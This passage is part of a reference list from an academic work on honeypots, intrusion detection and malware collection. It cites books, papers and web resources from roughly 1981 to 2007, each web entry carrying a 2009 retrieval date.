[Spitzner 2004] Spitzner, Lance: Problems and Challenges with Honeypots. Published: 2004. http://www.securityfocus.com/infocus/1757, Retrieved: August 11, 2009 [Stevens and Merkin 1995] Stevens, Curtis E. ; Merkin, Stan: El Torito Bootable CD-ROM Format Specification. Published: January 1995. http: //www.phoenix.com/NR/rdonlyres/98D3219C-9CC9-4DF5-B496-A286D893E36A/0/ specscdrom.pdf, Retrieved: August 11, 2009 174 References [Stevens 1994] Stevens, William R.: TCP/IP Illustrated I - The Protocols. AddisonWesley, 1994 [Stillwell et al. 1981] Stillwell, W.G. ; Seaver, D.A. ; Edwards, W.: A Comparison of Weight Approximation Techniques in Multiattribute Utility Decision Making. In: Organizational Behavior and Human Performance (1981), p. 62–78 [Stoll 2005] Stoll, Cliff: The Cuckoo’s Egg: Tracking a Spy Through the Maze of Computer Espionage. Pocket Books, 2005 [SWITCH 2002] SWITCH: Default TTL Values in TCP/IP. Published: 2002. http://secfr.nerim.net/docs/fingerprint/en/ttl_default.html, Retrieved: August 11, 2009 [Tanenbaum 2003] Tanenbaum, Andrew S.: Computer Networks. 4th Edition. Prentice Hall, 2003 [Thomas and Martin 2006] Thomas, Rob ; Martin, Jerry: The Underground Economy: Priceless. In: The USENIX Magazine 31 (2006), No. 6, p. 7–16 [Timm 2001] Timm, Kevin: Strategies to Reduce False Positives and False Negatives in NIDS. Published: September 2001. http://www.securityfocus.com/infocus/ 1463, Retrieved: August 11, 2009 [Troan and Brown 2002] Troan, Erik ; Brown, Preston: LOGROTATE(8). Published: November 2002. http://www.linuxcommand.org/man_pages/logrotate8.html, Retrieved: August 11, 2009 [Trümper 1999] Trümper, Winfried: Summary about Posix.1e. Published: 1999. http://wt.tuxomania.net/publications/posix.1e/, Retrieved: August 11, 2009 [Turnbull 2005] Turnbull, James: Hardening Linux. APress, 2005 [Vaughan et al. 2000] Vaughan, Gary V. ; Elliston, Ben ; Tromey, Thomas: Gnu Autoconf, Automake, and Libtool. New Riders Publishing, 2000 [Venema 1992] Venema, Wietse: TCP Wrapper: Network Monitoring, Access Control and Booby Traps. In: Proceedings of the Third Usenix UNIX Security Symposium, 1992 [Vind 2005] Vind, Janek: XSS and Full Path Disclosure in PhpBB 2.0.8. Published: January 2005. http://www.waraxe.us/index.php?modname=sa&id=34, Retrieved: August 11, 2009 175 References [Visa Inc. 2002] Visa Inc. (Editor): Visa Card Verification Value 2 (CVV2) Merchant Guide - A Tool for Understanding CVV2 for Greater Fraud Protection. Published: February 2002. http://www.bbbonline.org/eexport/doc/merchantguide_cvv2. pdf, Retrieved: August 11, 2009 [VMWare 2006] VMWare (Editor): Virtualization Overview. Published: 2006. http: //www.vmware.com/pdf/virtualization.pdf, Retrieved: August 11, 2009 [Vogelgesang 2007] Vogelgesang, Kay: The XAMPP Security Console. Published: 2007. http://www.apachefriends.org/en/xampp-windows.html#1221, Retrieved: August 11, 2009 [Wagner and Soto 2002] Wagner, David ; Soto, Paolo: Mimicry Attacks on HostBased Intrusion Detection Systems. In: Proceedings of the 9th ACM Conference on Computer and Communications Security, 2002 [Wang et al. 2006] Wang, Jisheng ; Hamadeh, Ihab ; Kesidis, George ; Miller, David J.: Polymorphic Worm Detection and Defense: System Design, Experimental Methodology, and Data Resources. In: Proceedings of the 2006 SIGCOMM workshop on Large-scale attack defense, 2006, p. 169 – 176 [Wang et al. 2005] Wang, Yi-Min ; Beck, Doug ; Jiang, Xuxian ; Roussev, Roussi ; Verbowski, Chad ; Chen, Shuo ; King, Sam: Automated Web Patrol with Strider HoneyMonkeys: Finding Web Sites That Exploit Browser Vulnerabilities / Microsoft Research. Published: August 2005. http://research.microsoft.com/en-us/um/redmond/projects/strider/ honeymonkey/ndss_2006_honeymonkey_wang_y_camera-ready.pdf. 2005 (MSRTR-2005-72). – Forschungsbericht [Watson 2007] Watson, David: GDH Global Distributed Honeynet. Published: December 2007. http://www.ukhoneynet.org/PacSec07_David_Watson_Global_ Distributed_Honeynet.pdf, Retrieved: August 11, 2009 [Watson et al. 2005] Watson, David ; Holz, Thorsten ; Mueller, Sven ; Honeynet Project (Editor): Know your Enemy: Phishing. Published: 2005. http://www. honeynet.org/papers/phishing/, Retrieved: August 11, 2009 [Wicherski and Holz 2006] Wicherski, Georg ; Holz, Thorsten: Effektives Sammeln von Malware mit Honeypots. In: Proceedings of 13th DFN-CERT Workshop, 2006 [Wikipedia 2007] Wikipedia: Comparison of Linux LiveDistros. Published: July 2007. http://en.wikipedia.org/wiki/Comparison_of_Linux_LiveDistros, Retrieved: August 11, 2009 176 References [Willems et al. 2007] Willems, Carsten ; Holz, Thorsten ; Freiling, Felix: Toward Automated Dynamic Malware Analysis Using CWSandbox. In: IEEE Security & Privacy 5 (2007), No. 2, p. 32–39 [Woo 2003] Woo, Hyung-Jin: The Hacker Mentality: Exploring the Relationship Between Psychological Variables and Hacking Activities, University of Georgia, (PHD Thesis), May 2003 [Wright et al. 2004] Wright, Charles P. ; Dave, Jay ; Gupta, Puja ; Krishnan, Harikesavan ; Zadok, Erez ; Zubair, Mohammad N.: Versatility and Unix Semantics in a Fan-Out Unification File System. Published: October 2004. http: //www.am-utils.org/docs/unionfs-tr/index.html, Retrieved: August 11, 2009 [Yoon and Hwang 1981] Yoon, Kwangsun ; Hwang, Ching-Lai: Multiple Attribute Decision Making: Methods and Applications. Springer, 1981 [Yoon and Hwang 1995] Yoon, Kwangsun ; Hwang, Ching-Lai: Multiple Attribute Decision Making: An Introduction. Sage, 1995 [Zalewski 2005] Zalewski, Michal: Silence on the Wire: A Field Guide to Passive Reconnaissance and Indirect Attacks. No Starch Press, 2005 [Zalewski 2006] Zalewski, Michal: p0f 2 - Passive OS Fingerprinting Tool. Published: 2006. http://lcamtuf.coredump.cx/p0f/README, Retrieved: August 11, 2009 [Zhang and Leckie 2006] Zhang, Dana ; Leckie, Christopher: An Evaluation Technique for Network Intrusion Detection Systems. In: Proceedings of the 1st International Conference on Scalable Information Systems, 2006 [Zhang 2004] Zhang, Harry: The Optimality of Naive Bayes. In: Proceedings of the 17th International FLAIRS Conference, 2004 177